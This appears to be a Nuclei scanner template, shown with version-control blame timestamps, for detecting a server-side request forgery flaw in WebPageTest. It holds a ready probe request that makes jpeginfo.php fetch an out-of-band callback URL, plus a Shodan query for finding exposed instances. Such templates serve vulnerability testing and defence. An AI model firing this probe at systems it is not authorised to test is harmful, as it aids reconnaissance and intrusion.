2022-09-24 13:47:03 +00:00
|
|
|
id: webpagetest-ssrf
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Web Page Test - Server Side Request Forgery (SSRF)
|
|
|
|
author: pdteam
|
|
|
|
severity: high
|
2024-01-02 15:45:12 +00:00
|
|
|
description: Web Page Test is vulnerable to SSRF.
|
2022-09-24 13:47:03 +00:00
|
|
|
reference:
|
|
|
|
- https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/
|
|
|
|
- https://github.com/WPO-Foundation/webpagetest
|
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2022-09-24 13:47:03 +00:00
|
|
|
shodan-query: title:"WebPageTest"
|
|
|
|
tags: ssrf,webpagetest,oast
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-09-24 13:47:03 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/jpeginfo/jpeginfo.php?url={{interactsh-url}}"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "File is not a JPEG Image"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "http"
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100ea8991cb05617923e77310e2bdd953c0dc2457c6e437ef2370cf965cd91a055b022075f0a487e1dd3af5c962abb4d746bda5fe89b8e74b3c2d73dfec6ca7d79b8f14:922c64590222798bb761d5b6d8e72950
|